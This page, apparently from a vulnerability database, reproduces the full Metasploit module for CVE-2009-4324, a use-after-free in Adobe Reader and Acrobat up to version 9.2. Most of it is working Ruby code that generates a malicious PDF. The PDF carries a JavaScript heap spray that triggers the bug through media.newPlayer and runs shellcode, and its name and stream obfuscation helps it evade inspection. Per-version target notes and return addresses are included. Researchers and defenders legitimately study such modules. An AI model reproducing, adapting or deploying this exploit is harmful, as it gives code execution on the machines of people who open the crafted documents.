Lucene search
K

Adobe Doc.media.newPlayer Use After Free Vulnerability

Adobe Doc.media.newPlayer Use After Free Vulnerability module for Adobe Reader and Acrobat Professional versions up to 9.2, exploits use after free vulnerability

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zlib'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',
      'Description'    => %q{
        This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat
        Professional versions up to and including 9.2.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'unknown', # Found in the wild
          # Metasploit version by:
          'hdm',
          'pusscat',
          'jduck'
        ],
      'References'     =>
        [
          [ 'CVE', '2009-4324' ],
          [ 'BID', '37331' ],
          [ 'OSVDB', '60980' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'         => 1024,
          'BadChars'      => "\x00",
          'DisableNops'	 => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # test results (on Windows XP SP3)
          # reader 6.0.1 - vulnerable / doesn't work
          # reader 7.0.5 - untested
          # reader 7.0.8 - untested
          # reader 7.0.9 - vulnerable / doesn't work
          # reader 7.1.0 - untested
          # reader 7.1.1 - untested
          # reader 8.0.0 - untested
          # reader 8.1.1 - works
          # reader 8.1.2 - untested
          # reader 8.1.3 - untested
          # reader 8.1.4 - untested
          # reader 8.1.5 - untested
          # reader 8.1.6 - untested
          # reader 9.0.0 - untested
          # reader 9.1.0 - works
          # reader 9.2 - works (no debugger, no DEP)
          [ 'Adobe Reader Windows English (JS Heap Spray)',
            {
              'Size'		=> (0x10000/2),
              'Ret'       => 0x0c0c0c0c,
            }
          ],
          [ 'Adobe Reader Windows German (JS Heap Spray)',
            {
              'Size'		=> (0x10000/2),
              'Ret'       => 0x0a0a0a0a,
            }
          ],
        ],
      'DisclosureDate' => '2009-12-14',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
      ])

  end

  def exploit

    # Encode the shellcode.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Make some nops
    nops      = Rex::Text.to_unescape([target.ret].pack('V'))

    # Randomize variables
    #
    len    = 72
    rand1  = rand_text_alpha(rand(100) + 1)
    rand2  = rand_text_alpha(rand(100) + 1)
    rand3  = rand_text_alpha(rand(100) + 1)
    rand4  = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
    rand5  = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')

    vtbuf = [target.ret].pack('V') * 4
    vtbuf << rand_text_alpha(len - vtbuf.length)
    vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
    retstring  = Rex::Text.to_unescape(vtbuf)

    # The printd strings are 72 bytes (??)
    script = %Q|
var #{rand1} = unescape("#{shellcode}");
var #{rand2} = unescape("#{nops}");
var #{rand3} = unescape("#{retstring}");

while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
  #{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);

memory=new Array();

for(i=0;i<0x2000;i++) {
  memory[i]= #{rand2} + #{rand1};
}

util.printd("#{rand4}", new Date());
util.printd("#{rand5}", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(#{rand3}, new Date());
|

    # Create the pdf
    pdf = make_pdf(script)

    print_status("Creating '#{datastore['FILENAME']}' file...")

    file_create(pdf)

  end


  def random_non_ascii_string(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr
    end
    result
  end

  def io_def(id)
    "%d 0 obj" % id
  end

  def io_ref(id)
    "%d 0 R" % id
  end


  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
  def n_obfu(str)
    result = ""
    str.scan(/./u) do |c|
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
        result << "#%x" % c.unpack("C*")[0]
      else
        result << c
      end
    end
    result
  end


  def ascii_hex_whitespace_encode(str)
    result = ""
    whitespace = ""
    str.each_byte do |b|
      result << whitespace << "%02x" % b
      whitespace = " " * (rand(3) + 1)
    end
    result << ">"
  end


  def make_pdf(js)

    xref = []
    eol = "\x0d\x0a"
    endobj = "endobj" << eol

    pdf = "%PDF-1.5" << eol
    pdf << "%" << random_non_ascii_string(4) << eol
    xref << pdf.length
    pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
    xref << pdf.length
    pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
    xref << pdf.length
    pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
    xref << pdf.length
    pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
    xref << pdf.length
    pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
    xref << pdf.length
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
    pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
    pdf << "stream" << eol
    pdf << compressed << eol
    pdf << "endstream" << eol
    pdf << endobj
    xrefPosition = pdf.length
    pdf << "xref" << eol
    pdf << "0 %d" % (xref.length + 1) << eol
    pdf << "0000000000 65535 f" << eol
    xref.each do |index|
      pdf << "%010d 00000 n" % index << eol
    end
    pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
    pdf << "startxref" << eol
    pdf << xrefPosition.to_s() << eol
    pdf << "%%EOF" << eol

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 29.3
CVSS 3.17.8
EPSS0.81933
33